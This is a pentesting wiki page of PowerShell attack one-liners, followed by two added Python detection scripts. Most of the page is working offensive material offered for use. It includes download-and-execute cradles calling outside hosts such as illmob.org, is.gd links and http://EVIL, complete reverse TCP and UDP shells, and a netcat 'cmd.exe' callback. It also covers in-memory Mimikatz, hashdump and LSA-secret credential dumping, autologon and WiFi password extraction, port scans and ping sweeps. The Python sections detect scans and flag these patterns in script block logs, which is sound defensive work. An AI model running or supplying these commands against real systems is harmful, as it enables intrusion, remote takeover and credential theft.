From BHaFSec Pentesting Notes Wiki

WebDL and execute

powershell -ExecutionPolicy Bypass -noLogo -Command Import-Module BitsTransfer;Start-BitsTransfer http://www.illmob.org/test.exe test.exe;./test.exe;


powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://illmob.org/test.exe','test.exe');./test.exe;


powershell -ExecutionPolicy Bypass -noLogo -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')

Reverse TCP Shell

$client = New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Reverse UDP Shell

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse(""),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

WebDL and execute mimikatz totally in memory

Uses Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory to dump credentials without ever writing the mimikatz binary to disk. Dumps all domain creds with mimikatz.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

This Invoke-Mimikatz.cs.ps1 invokes x86 or x64 Mimikatz inside of the PowerShell process.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/BD2toB'); Invoke-Mimikatz -DumpCreds"

WebDL and execute hashdump totally in memory

Hashes are dumped using a modified version of the powerdump script from MSF written by David Kennedy. Administrator privileges are required for this script.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/MHa1Bj'); Get-PassHashes"

WebDL and execute Get-VaultCredential totally in memory

Get-VaultCredential enumerates and displays all credentials stored in the Windows vault. Web credentials, specifically, are displayed in cleartext.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/57uScy'); Get-VaultCredential"

WebDL and execute LSA Secrets totally in memory

Extracts LSA secrets from HKLM:\SECURITY\Policy\Secrets\ on a local computer. The payload must be run with elevated permissions, in 32-bit mode, and requires permissions to the SECURITY key in HKLM. The permission could be obtained by using the Enable-DuplicateToken payload.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/qhgsX1');"

Dump stored Autologon password

Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' | select defaultusername,defaultpassword

Dump WIFI Passwords

$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
$exportdata = $wlans | Foreach-Object {$_.Replace("    All User Profile     : ",$null)}
$exportdata | ForEach-Object {netsh wlan show profile name="$_" key=clear}


(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize


(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} |%{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize


foreach($profil in (netsh wlan show profiles | Select-String ':')){foreach($line in (netsh wlan show profile name=($profil.toString().split(':')[1].trim()) key=clear)){$line+';'}};


SID 2 User

((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value

USERS2SID & Last Logon

gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto

Query Domain Admins

Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"

Query Process/Service

gps | ?{$_.name -match "<process/service name>"} | ?{$_.id -match "<process/service id>"} | select *

Query Drives


WebInject callback

powershell.exe (new-object System.Net.WebClient).Downloadfile('', 'nc.exe')

Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat:

nc.exe -e cmd.exe 21

Port Scan

PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("",$_)) "Port $_ is open!"} 2>$null 

Ping Sweep

PS C:\> 1..255 | % {echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | Select-String ttl}
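As an added example (not part of the wiki), here is what the port scan and ping sweep above look like from the other side. The Python below parses lines laid out in the Windows Firewall pfirewall.log field order and flags one source touching many distinct ports on one host within a short window, or sending ICMP echo requests to many hosts. Every log line is constructed inside the script; the addresses, timestamps and thresholds are arbitrary choices, not values from the page.

```python
"""Detect the sequential port-scan and ping-sweep shapes shown on this page
in Windows Firewall log lines (pfirewall.log field order).

Added example: the log below is constructed, not a real capture, and the
thresholds are illustrative defaults."""
from collections import defaultdict
from datetime import datetime

# Field order of the Windows Firewall log (#Fields header line).
FIELDS = ("date", "time", "action", "protocol", "src_ip", "dst_ip", "src_port",
          "dst_port", "size", "tcpflags", "tcpsyn", "tcpack", "tcpwin",
          "icmptype", "icmpcode", "info", "path")


def parse_firewall_log(text):
    """Turn log text into a list of dicts; comment lines and malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def find_port_scans(records, min_ports=20, window_seconds=60):
    """One source contacting at least min_ports distinct TCP ports on one host,
    with the first contact of each port falling inside window_seconds.
    Returns {(src_ip, dst_ip): distinct_port_count}."""
    first_seen = defaultdict(dict)  # (src, dst) -> {dst_port: first timestamp}
    for r in records:
        if r["protocol"] != "TCP":
            continue
        first_seen[(r["src_ip"], r["dst_ip"])].setdefault(int(r["dst_port"]), r["ts"])
    flagged = {}
    for pair, ports in first_seen.items():
        times = sorted(ports.values())
        span = (times[-1] - times[0]).total_seconds()
        if len(ports) >= min_ports and span <= window_seconds:
            flagged[pair] = len(ports)
    return flagged


def find_ping_sweeps(records, min_hosts=10):
    """One source sending ICMP echo requests (type 8) to at least min_hosts hosts.
    Returns {src_ip: distinct_host_count}."""
    hosts = defaultdict(set)
    for r in records:
        if r["protocol"] == "ICMP" and r["icmptype"] == "8":
            hosts[r["src_ip"]].add(r["dst_ip"])
    return {src: len(h) for src, h in hosts.items() if len(h) >= min_hosts}


def _build_sample_log():
    """Constructed sample log (not captured traffic)."""
    lines = ["#Fields: date time action protocol src-ip dst-ip src-port dst-port size "
             "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path"]
    # 10.10.10.5 walks ports 21-50 on 10.10.10.20 within three seconds
    for i, port in enumerate(range(21, 51)):
        lines.append(f"2024-05-01 09:00:{i // 10:02d} DROP TCP 10.10.10.5 10.10.10.20 "
                     f"{50000 + i} {port} 52 S 0 0 64240 - - - RECEIVE")
    # the same source echo-requests 10.10.10.1 .. 10.10.10.25
    for i in range(1, 26):
        lines.append(f"2024-05-01 09:01:{i:02d} DROP ICMP 10.10.10.5 10.10.10.{i} "
                     f"- - 60 - - - - 8 0 - RECEIVE")
    # benign: a workstation opening a few SMB sessions to the file server
    for i in range(5):
        lines.append(f"2024-05-01 09:02:{i:02d} ALLOW TCP 10.10.10.7 10.10.10.20 "
                     f"{49152 + i} 445 52 S 0 0 64240 - - - RECEIVE")
    return "\n".join(lines)


SAMPLE_LOG = _build_sample_log()

if __name__ == "__main__":
    recs = parse_firewall_log(SAMPLE_LOG)
    print("port scans :", find_port_scans(recs))
    print("ping sweeps:", find_ping_sweeps(recs))
```

The window check uses the first time each port was touched, so a slow scan spread over hours is not caught by the defaults; lowering `min_ports` or raising `window_seconds` trades that against noise from legitimate multi-port clients such as the SMB workstation in the sample.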

Find Files

PS C:\> Get-ChildItem "C:\Users\" -recurse -include *passwords*.txt

Text 2 Speech

powershell (New-Object -ComObject Sapi.SpVoice).Speak(('All Your Base R Belong To Us.'))

Other Resources: Nishang Github

Download Cradles

from https://gist.github.com/HarmJ0y/bb48307ffa663256e239

1. normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
2. PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
3. hidden IE COM object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
4. Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
5. WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
6. using BitsTransfer - touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
7. DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1); the code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
8. from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<?xml version="1.0"?>
$a = New-Object System.Xml.XmlDocument
$a.command.a.execute | iex
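The cradles above, the WebDL-and-execute one-liners at the top of the page and the reverse TCP/UDP shells all share fixed strings that appear verbatim in PowerShell script block logs (event ID 4104, ScriptBlockText field) when script block logging is enabled. The following is an added example, not from the wiki, the HarmJ0y gist or any tool it links: a small Python triage routine that runs those strings as rules over constructed ScriptBlockText samples. The rule names, the two severity tiers, and the hosts and URLs in the samples are all my own constructions.

```python
"""Triage PowerShell script block text (the ScriptBlockText of a 4104 event)
against the download-cradle, reverse-shell and in-memory-dump patterns
listed on this page.

Added example: rule names, severity tiers and the sample events are
constructed here, not taken from any real log or tool."""
import re

# Anything that executes a string as code; used both as a rule part and
# to decide whether a fetch is followed by execution in the same block.
IEX = r"\b(iex|Invoke-Expression)\b"

# Every regex in a rule's list must match somewhere in the block for the
# rule to fire; the order in which they appear in the text does not matter.
RULES = {
    "net-webclient-download":  [r"Net\.WebClient\)?\.Download(String|File)"],
    "invoke-webrequest":       [r"\b(iwr|Invoke-WebRequest)\b"],
    "ie-com-object":           [r"InternetExplorer\.Application"],
    "msxml-xmlhttp":           [r"Msxml2\.XMLHTTP"],
    "winhttp-request":         [r"WinHttp\.WinHttpRequest"],
    "bits-transfer":           [r"Start-BitsTransfer"],
    "dns-txt-base64":          [r"nslookup\s+-querytype=txt", r"FromBase64String"],
    "tcp-reverse-shell":       [r"Sockets\.TCPClient", r"\.GetStream\(\)", IEX],
    "udp-reverse-shell":       [r"Sockets\.UDPClient", r"\.Receive\(", IEX],
    "invoke-mimikatz":         [r"Invoke-Mimikatz"],
    "execution-policy-bypass": [r"-ExecutionPolicy\s+Bypass"],
}
COMPILED = {name: [re.compile(p, re.I | re.S) for p in pats] for name, pats in RULES.items()}

# Fetch rules only reach "high" when the same block also executes the result.
FETCH_RULES = {"net-webclient-download", "invoke-webrequest", "ie-com-object",
               "msxml-xmlhttp", "winhttp-request", "bits-transfer"}
# These are "high" on their own.
HIGH_RULES = {"dns-txt-base64", "tcp-reverse-shell", "udp-reverse-shell", "invoke-mimikatz"}


def classify(script_text):
    """Sorted names of every rule whose patterns all match the block."""
    return sorted(name for name, pats in COMPILED.items()
                  if all(p.search(script_text) for p in pats))


def triage(script_text):
    """Return {'hits': [...], 'severity': 'none' | 'medium' | 'high'}."""
    hits = classify(script_text)
    executes = re.search(IEX, script_text, re.I) is not None
    fetches = any(h in FETCH_RULES for h in hits)
    if any(h in HIGH_RULES for h in hits) or (fetches and executes):
        severity = "high"
    elif hits:
        severity = "medium"
    else:
        severity = "none"
    return {"hits": hits, "severity": severity}


# Constructed sample blocks; hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    # shape of the "normal download cradle"
    "IEX (New-Object Net.Webclient).downloadstring('http://example.invalid/evil.ps1')",
    # benign administration, should not fire
    "Get-ChildItem C:\\Logs -Recurse | Where-Object Length -gt 1MB",
    # a download that lands on disk and is not executed by the same block
    "Invoke-WebRequest 'https://example.invalid/report.csv' -OutFile C:\\Temp\\report.csv",
    # shape of the reverse TCP shell
    "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)",
    # DNS TXT cradle: base64 text record decoded and executed
    "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("
    "(nslookup -querytype=txt 'c2.example.invalid'))))",
    # in-memory credential dump following a cradle
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1'); Invoke-Mimikatz -DumpCreds",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        result = triage(event)
        print(f"{result['severity']:<6} {result['hits']}  {event[:60]}")
```

Two caveats on the design: 4104 events only exist where script block logging is turned on, and fixed-string rules like these are defeated by simple obfuscation of the cmdlet and type names, so a production rule set pairs them with the decoded-block logging PowerShell performs and with process-level telemetry. The `-ExecutionPolicy Bypass` rule is kept at "medium" on purpose; the execution policy is not a security boundary and the switch is routine in legitimate automation.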